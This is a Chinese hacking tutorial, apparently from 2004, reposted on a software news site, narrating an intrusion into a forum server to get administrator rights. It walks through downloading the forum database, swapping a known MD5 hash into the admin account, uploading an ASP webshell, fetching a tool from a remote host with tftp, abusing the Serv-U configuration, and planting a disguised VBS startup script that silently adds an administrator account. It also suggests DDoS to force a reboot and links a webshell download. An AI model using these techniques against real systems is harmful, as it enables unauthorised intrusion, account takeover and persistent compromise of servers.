文章导航PC6首页软件下载单机游戏安卓资源苹果资源

pc软件新闻网络操作系统办公工具编程服务器软件评测

安卓新闻资讯应用教程刷机教程安卓游戏攻略tv资讯深度阅读综合安卓评测

苹果ios资讯苹果手机越狱备份教程美化教程ios软件教程mac教程

单机游戏角色扮演即时战略动作射击棋牌游戏体育竞技模拟经营其它游戏游戏工具

网游cf活动dnf活动lol周免英雄lol礼包

手游最新动态手游评测手游活动新游预告手游问答

您的位置:首页资讯网络应用 → asp木马配合servu取得管理员权限

asp木马配合servu取得管理员权限

时间:2004/10/8 16:34:00来源:本站整理作者:蓝点我要评论(0)

    今天心情不好,写一篇文章玩玩吧,利用网站的配置错误配合serv-u取得管理员权限,简单一点就是通过asp木马配合serv-u取得管理员权限,哈哈哈,是不是很cool阿! 
------------文章开始------------ 
为了找仓木麻衣的mp3(这个小姑娘的歌很好听阿),把半个互联网都搜完了(太夸张了把),就是找不到,苦然眼镜一亮,哈哈哈×××论坛,看来人气不错,也有mp3的下载地址,那就去看看吧 
晕~~~~, 
论坛错误信息 
产生错误的可能原因: 
您是否仔细阅读了帮助文件,可能您还没有登陆或者不具有使用当前功能的权限。 
还要注册阿,可是论坛由于种种原因又不让注册 
气的我差点吐血! 
怎么办阿???唉本想用溯雪破解几个密码。可是我们这个落后的地方上网贵,速度慢,有那个钱早就可以去买几张d版cd了,算了想想别的办法把,打开我的xscan,随便扫了一下,服务器挺安全阿,只开了21,80,3389端口 
看来做了端口过滤 
没什么可利用的漏洞怎么办,不要着急,他用的是动网论坛,先试着下载他的数据库试试吧 
手动的找了一些,都不行 
我先猜一下数据库在哪个目录里面,如果猜对的话下载数据库的成功率就比较高了 
http://aaa.com/data 
http://aaa.com/database 
http://aaa.com/db 
HTTP 错误 404 - 找不到文件 
Internet 信息服务 
继续 
http://aaa.com/mdb 
HTTP 错误 403 - 禁止访问 
Internet Explorer 
把我以前些的添加的数据库地址文件载入xscan(专门下载数据库的地址),然后只扫描cgi漏洞 
scaning.......,大概10分钟过去了 
扫描结果 
/mdb/lovemaik.asa [漏洞描述] 
哈哈哈,成功的扫到了数据库 
顺便告诉大家一个技巧,把一些常用的数据库地址如data.mdb,database.asp等等添加到xscan的cgi数据库中,或者单独作一个数据库,你可以用一些字典来生成数据库地址,这样的成功率很高的! 
打开Net Transport(一种很爽的下载工具)把数据库down过来,用了50多分钟,终于下载完了 
在自己的机器上安装jmail和动网论坛,把下载的数据库覆盖新数据库,接着注册用户:allen,密码:123456 
调然后把数据库扩展名改为.mdb ,打开 
查看我们刚才注册的用户密码为49ba59abbe56e057(由于论坛使用md5不可逆算法加密,所以不那得到明文密码) 
好的把这一串数据复制一下,然后找到管理员的名字,也就是查找userclass表中数据为管理员的名字 
把他的密码改成49ba59abbe56e057,记住在改密码之前一定要把他的密码(经过MD5加密过的)复制到一个记事本里 
好了,我们用管理员的名字登陆,密码就是123456,接着我们就去修改用户资料,把回答问题和答案改掉!把email换成自己的,接着把刚才注册的用户allen提升为管理员,退出,在用allen帐号登陆,把原来的管理员降成普通用户,可能有些会问这样做是为什么,原因是动网论坛不允许管理员通过email取回密码,接着在打开数据库把原来管理员的密码给恢复了,在打开论坛,忘记密码-回答问题-取回密码,哈哈哈,快打开你的信箱把,密码已经发到你信箱了(注意,你的系统最好装jmail等邮件发送组件,要不然就会发不了邮件的) 
现在我们拿到了论坛管理员的密码了,登陆那个论坛-进入管理页面-论坛版面管理 -随便选一个讨论区-在上传文件类型中加上.asp,呵呵 
好了,进去这个讨论区发表帖子-上传文件,呵呵,把asp木马传上去 
好了,可是这个文件被重命名了,唉,新亏手里还有一个免fso的木马,只有一个文件。传上去 
可惜这个木马不好用,还是自己的木马用着顺手,于是tftp -i ***.***.***.*** GET use.asp 
好了,成功了,接这运行木马www.***.com/bbs/use.asp?id=1 
呵呵,服务器的东西清清楚楚的摆在我们面前了,上传一个winshell把 
靠,服务器有病毒防火墙,看看是nav的,算了,自己加个壳把 
继续,传上去并执行。。。。没反应! 
先telnet ip 8210(我喜欢用noika手机的型号做为端口,^_^) 
靠,不行,差点忘了,对方做端口过滤了 
怎么办阿,试试idq.dll(没报什么希望),果然对方的目录不可执行,在看一下对方有没有装perl 
还是没有!在看看对方是什么分区格式,要是fat32那就好办了,试着删除c:\的任何文件都提示没有权限!唉,麻烦阿!!! 
本来想就此打住的时候突然发现了d:\Serv-U,于是我就想通过他来拿到权限 
注:在此之前最好在自己的机器上装一个Serv-U, 
我们先看看ServUStartUpLog.txt 
Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright (c) 1995-2002 Cat 
。。。。。。。。。。 
版本挺新阿,呵呵 
接着看看ServUDaemon.ini(用户配置文件) 
哇考,里面的用户真多阿! 
接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:\ 
哈哈哈,到次为止大家都知道我的用意了把! 
接这ftp上去 
哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u) 
由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了! 
我们先写一个vbs脚本,把这个脚本重命名为Adobe Gamma Loader,这样管理员不容易发现! 
脚本内容: 
set wshshell=createobject ("wscript.shell" ) 
a=wshshell.run ("cmd.exe /c net user allen ***** /add",0) 
b=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0) 
大家都能看懂把,哈哈 
然后把他传到Documents and Settings\All Users\「开始」菜单\程序\启动\ 
呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。 

接着用asp木马上传一个shutdown.exe 
然后执行shutdown.exe 127.0.0.1 /r 
哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。 
不过在nt or 2000上普通用户都可以重起机器 
还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了! 
如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的) 

重启之后只要管理员登陆就可以添加一个帐号,哈哈 
到此为止我已经拥有了管理员权限,呵呵 


(关于端口过滤) 
一般服务器至少会开21,80端口,像这种情况,即使有了管理员权限也没有多大用处! 
如果你可以得到一些bbs或者其他程序的管理员密码就比较好办了 
先传asp木马,然后用sc停掉ftp服务,接着弄一些后门来占用21端口 
或者干脆暴力的占用!不过这些办法在ntfs的分区上成功率并不高!经过实践我发现一般可以暴力占用80端口,前提是对方web服务器为iis!这样在你没有完全拿到管理员权限之前,对方的网站可能会一直瘫痪,哈哈! 

本文涉及到的asp木马可以去 
http://coolice.hnit.aosee.com/soft.rar

相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论
发表评论

热门文章 360免费wifi电脑版怎么有道云笔记怎么保存网有道云笔记内容丢失怎360免费wifi一直显示正

最新文章 微博热搜宝盒是什么 微最新微信编辑器哪个好 百度网盘安全吗?百度网盘信息泄露怎么回事乐视云盘关闭怎么办 乐视云盘关闭怎么转移文百度云盘下载速度慢解决方法2017 百度云盘下百度网盘怎么用迅雷下载2017 百度网盘怎么用

人气排行 无线网络密码破解WPA/WPA2教程(包教包会)微信编辑器哪个好 3种实用微信编辑器推荐foxmail邮件存储位置在哪 foxmail7.2邮件存p2p种子搜索器用不了解决办法360免费wifi没有无线网卡怎么办百度云网盘中怎么添加好友 百度云网盘添加微信电脑版聊天记录保存在哪 微信电脑版文件360云盘上传速度慢怎么办 360云盘上传速度慢